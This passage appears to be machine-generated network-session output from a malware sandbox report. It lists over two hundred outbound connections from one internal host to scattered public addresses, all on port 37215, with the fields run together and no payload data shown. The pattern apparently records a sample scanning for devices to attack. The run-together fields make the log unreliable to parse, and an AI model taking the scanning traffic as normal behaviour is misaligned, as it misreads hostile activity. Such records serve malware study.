                                              16209192.168.2.153741431.119.222.3837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16210192.168.2.1539752181.206.228.23137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16211192.168.2.1533938181.120.45.15937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16212192.168.2.1543868156.180.210.9637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16213192.168.2.1542884181.79.43.6937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16214192.168.2.1544260138.163.10.17237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16215192.168.2.1534900157.211.2.6737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16216192.168.2.153675037.194.21.16737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16217192.168.2.153289094.3.136.15937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16218192.168.2.1555346190.174.159.3537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16219192.168.2.1560092121.223.31.1537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16220192.168.2.1539910157.97.105.20637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16221192.168.2.1547252181.63.8.22337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16222192.168.2.154760094.48.135.17137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16223192.168.2.1548036157.100.182.22937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16224192.168.2.1535620222.207.244.11637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16225192.168.2.1532948122.39.9.15837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16226192.168.2.1552458102.213.121.21337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16227192.168.2.1544206222.103.195.10037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16228192.168.2.154846857.230.49.21037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16229192.168.2.154873894.172.174.16137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16230192.168.2.1556392122.232.6.10037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16231192.168.2.1555536181.122.36.20037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16232192.168.2.154906894.128.85.5737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16233192.168.2.1536718156.122.107.13637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16234192.168.2.155735694.66.133.3937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16235192.168.2.1560958222.232.82.17137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16236192.168.2.1559884197.212.225.25237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16237192.168.2.154036894.18.160.7637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16238192.168.2.153366437.234.197.13037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16239192.168.2.1536668157.246.18.15937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16240192.168.2.1545568181.15.217.11937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16241192.168.2.155666631.181.98.20937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16242192.168.2.1541102156.41.106.7837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16243192.168.2.1559628190.20.133.2137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16244192.168.2.1558612138.27.196.9237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16245192.168.2.1537548190.103.202.23537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16246192.168.2.155994627.24.212.13937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16247192.168.2.1546022221.167.169.20837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16248192.168.2.1549156197.95.187.037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16249192.168.2.154306631.128.82.22637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16250192.168.2.155781231.93.159.24737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16251192.168.2.1554364121.79.239.24737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16252192.168.2.1546776102.123.178.4437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16253192.168.2.1555918197.171.112.18637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16254192.168.2.1540550190.22.95.19737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16255192.168.2.1534046156.208.27.3137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16256192.168.2.1557706197.42.145.337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16257192.168.2.153446645.197.30.237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16258192.168.2.1549570121.4.165.2137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16259192.168.2.1533394157.246.232.7637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16260192.168.2.15528325.64.101.7237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16261192.168.2.1537824186.214.65.14837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16262192.168.2.1546208157.171.5.23837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16263192.168.2.155632037.151.117.25137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16264192.168.2.1538402121.7.65.7737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16265192.168.2.1537728157.155.78.637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16266192.168.2.1558618197.182.202.7137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16267192.168.2.154813431.99.112.13437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16268192.168.2.1557842197.22.196.5437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16269192.168.2.153826831.85.146.10037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16270192.168.2.1556630222.174.167.037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16271192.168.2.1548058197.49.195.1437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16272192.168.2.1556230122.50.206.23037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16273192.168.2.1560298102.103.253.037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16274192.168.2.154550631.251.204.16337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16275192.168.2.1555666156.121.182.837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16276192.168.2.1535916157.113.92.14237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16277192.168.2.1555912156.203.15.6537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16278192.168.2.1557488122.167.140.3437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16279192.168.2.1547852102.173.93.22537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16280192.168.2.155339031.64.191.2037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16281192.168.2.154823294.88.210.21437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16282192.168.2.1559720186.154.228.25437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16283192.168.2.1551370122.105.56.24137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16284192.168.2.1555186101.132.162.23637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16285192.168.2.155526437.178.208.7837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16286192.168.2.1553886138.132.71.6837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16287192.168.2.1551450165.186.132.22437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16288192.168.2.1542104186.65.237.5737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16289192.168.2.1558516190.230.68.11737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16290192.168.2.154462041.237.142.6137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16291192.168.2.1551162190.129.207.20237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16292192.168.2.153369294.212.97.15337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16293192.168.2.1534144190.61.207.9837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16294192.168.2.1554326181.252.38.937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16295192.168.2.1549852138.241.133.10437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16296192.168.2.155211445.119.66.637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16297192.168.2.1544882197.239.94.18937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16298192.168.2.1547024181.16.152.25337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16299192.168.2.1538638138.123.170.23137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16300192.168.2.153406894.110.49.23837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16301192.168.2.155647245.143.245.10837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16302192.168.2.154539845.170.56.16037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16303192.168.2.153648494.99.201.3037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16304192.168.2.1534028157.51.61.11437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16305192.168.2.154171845.98.239.14037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16306192.168.2.1536402157.89.41.20137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16307192.168.2.1538100122.217.91.10037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16308192.168.2.153806041.234.229.24237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16309192.168.2.1547958157.92.166.7237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16310192.168.2.1556422190.85.171.14037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16311192.168.2.1546552186.34.57.15037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16312192.168.2.1543316222.102.83.15137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16313192.168.2.155405841.194.54.3837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16314192.168.2.154003694.62.17.13537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16315192.168.2.154554441.52.189.16437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16316192.168.2.1545174121.111.116.8037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16317192.168.2.154540645.217.184.13037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16318192.168.2.1533182121.111.226.12537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16319192.168.2.1541998197.130.156.12237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16320192.168.2.1535546197.139.10.4737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16321192.168.2.155104437.139.113.6237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16322192.168.2.1547218197.184.159.5537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16323192.168.2.155411645.79.64.24737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16324192.168.2.1558600157.160.162.16137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16325192.168.2.1560222222.172.172.16337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16326192.168.2.1548682157.5.103.13137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16327192.168.2.155059841.33.251.11237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16328192.168.2.155754294.58.226.4037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16329192.168.2.153609431.94.104.6337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16330192.168.2.1538694181.40.249.8837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16331192.168.2.155486841.2.48.3737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16332192.168.2.154099486.180.213.18637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16333192.168.2.154430650.2.155.23837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16334192.168.2.1539246121.128.240.14237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16335192.168.2.153392245.34.95.18037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16336192.168.2.1554812186.196.82.14537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16337192.168.2.1549484138.63.46.12237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16338192.168.2.1551946122.144.120.17137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16339192.168.2.154988645.237.36.9637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16340192.168.2.155805241.21.226.837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16341192.168.2.1555384138.135.0.14837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16342192.168.2.1560038186.219.39.19837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16343192.168.2.153802641.231.104.16437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16344192.168.2.154778631.95.135.22737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16345192.168.2.1543624193.179.252.4337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16346192.168.2.155941245.140.169.9637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16347192.168.2.1534028190.210.87.12937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16348192.168.2.1535600102.150.159.24537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16349192.168.2.1559752156.0.17.22337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16350192.168.2.1560484181.164.123.21837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16351192.168.2.1544120157.239.255.3537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16352192.168.2.1559266190.10.125.537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16353192.168.2.1555396122.227.1.17637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16354192.168.2.1537532222.160.19.5837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16355192.168.2.1539658156.200.54.13637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16356192.168.2.1557646190.9.214.12537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16357192.168.2.154910045.17.250.16437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16358192.168.2.153948845.202.95.14037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16359192.168.2.1537074181.219.176.17137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16360192.168.2.1560248186.194.210.21537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16361192.168.2.1544062117.28.158.15237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16362192.168.2.1545464157.106.41.15937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16363192.168.2.153516237.246.84.6737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16364192.168.2.1536636222.97.53.24237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16365192.168.2.1554964102.222.201.13737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16366192.168.2.154586445.245.240.8437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16367192.168.2.1546076102.6.17.9237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16368192.168.2.1547072181.161.36.16637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16369192.168.2.1546320181.72.241.12837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16370192.168.2.1558410122.183.3.19437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16371192.168.2.154064094.47.154.10637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16372192.168.2.1560930102.83.142.7137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16373192.168.2.1533114157.242.11.20237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16374192.168.2.155409437.98.227.20637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16375192.168.2.154058294.219.151.12537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16376192.168.2.1537342121.241.84.8037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16377192.168.2.1557860222.177.238.9737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16378192.168.2.155337637.245.181.22037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16379192.168.2.155831294.197.246.1637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16380192.168.2.155376837.242.77.18237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16381192.168.2.153923241.241.95.14437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16382192.168.2.1560864186.238.229.6337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16383192.168.2.1536764122.157.68.19837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16384192.168.2.1533606190.127.128.3437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16385192.168.2.1542072122.225.47.21537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16386192.168.2.156061431.158.191.6737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16387192.168.2.1536164222.49.250.19937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16388192.168.2.1544356186.6.169.9937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16389192.168.2.1555956102.113.190.4337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16390192.168.2.1556938122.3.152.1737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16391192.168.2.1546042186.20.11.937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16392192.168.2.155927245.152.234.2837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16393192.168.2.1537304138.195.216.17937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16394192.168.2.1534512157.168.61.19437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16395192.168.2.1545504197.63.10.25037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16396192.168.2.1553502222.65.144.4937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16397192.168.2.1533290181.145.23.9437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16398192.168.2.1559582186.93.212.8637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16399192.168.2.1558410138.43.119.24137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16400192.168.2.1545002181.4.245.1437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16401192.168.2.153518441.41.237.8037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16402192.168.2.155310494.204.6.5737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16403192.168.2.1551976222.218.172.14537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16404192.168.2.1545360181.80.24.8037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16405192.168.2.1540760186.88.110.10537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16406192.168.2.1552130128.24.107.15637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16407192.168.2.155771237.75.205.10137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16408192.168.2.1538570138.49.227.3837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16409192.168.2.1532846222.21.59.1337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16410192.168.2.153359031.2.6.10537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16411192.168.2.1536350156.127.142.21137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16412192.168.2.1542018190.116.190.12637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16413192.168.2.155451437.107.247.1537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16414192.168.2.153506237.234.206.7437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16415192.168.2.1542428102.251.180.15137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16416192.168.2.1543908157.101.150.1137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16417192.168.2.154513894.230.61.14237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16418192.168.2.155917445.24.16.22437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16419192.168.2.1550078181.39.211.10837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16420192.168.2.1548266138.60.9.137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16421192.168.2.1533046121.81.75.6837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16422192.168.2.1558512122.136.248.18337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16423192.168.2.1548890157.169.168.9137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16424192.168.2.1544578157.246.102.24637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16425192.168.2.154227631.186.248.10437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16426192.168.2.1538360122.188.134.17137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16427192.168.2.15591782.171.7.6337215
                                              TimestampBytes transferredDirectionData


